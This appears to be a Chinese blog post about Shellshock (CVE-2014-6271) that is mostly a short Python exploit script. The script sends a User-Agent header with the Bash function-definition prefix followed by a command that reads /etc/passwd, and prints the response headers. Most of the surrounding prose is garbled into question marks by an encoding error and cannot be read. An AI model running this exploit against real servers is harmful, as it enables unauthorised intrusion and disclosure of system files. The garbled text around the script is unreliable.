????????Bash?????????????????????(CVE-2014-6271)??????μ???isc???????????????£?д???python?汾?????С?????????????
#coding:utf-8
import httplib
import re
import sys
import urllib
import urlparse
#author:nx4dm1n
#website:http://www.nxadmin.com
def bash_exp(url):
    """Send one CVE-2014-6271 (Shellshock) test request and print the reply headers.

    Only the host and path of `url` are used: the request always goes out
    over plain HTTP via httplib.HTTPConnection, and any query string is
    dropped. Each response header is printed as "name:value".

    Detection note: the request carries a User-Agent whose value begins
    with the Bash function-definition prefix "() {", which is a reliable
    signature to match in web-server logs or WAF rules. A host with a
    patched Bash does not run the command that follows the prefix.

    NOTE(review): presumably a vulnerable CGI emits the command output
    into the header section of its response, which would explain why only
    headers are printed and the body is never read; confirm.
    """
    target = urlparse.urlparse(url)
    # Function-definition prefix followed by a trailing command; a CGI
    # server passes this header to the script as an environment variable.
    probe_headers = {"User-Agent": "() { :;}; echo `/bin/cat /etc/passwd`"}
    connection = httplib.HTTPConnection(target.netloc)
    connection.request("GET", target.path, headers=probe_headers)
    # getheaders() yields (name, value) pairs.
    for name, value in connection.getresponse().getheaders():
        print(name + ':' + value)
if __name__ == '__main__':
    # NOTE(review): the original comment on this line was lost to an
    # encoding error; only the word "http" survives.
    # Expects exactly one meaningful argument: the URL of the CGI to test.
    if len(sys.argv) >= 2:
        bash_exp(sys.argv[1])
    else:
        print("Usage: " + sys.argv[0] + " http://www.nxadmin.com/cgi-bin/index.cgi")
        sys.exit()
??????????Ч??????????

????bash???????
???????????burp???в????
???????????????????????????飬д??pythonС???????????cat /etc/passwd????????з??????????????????????shell?????п??????????????????????????????????????Щ???????????????????????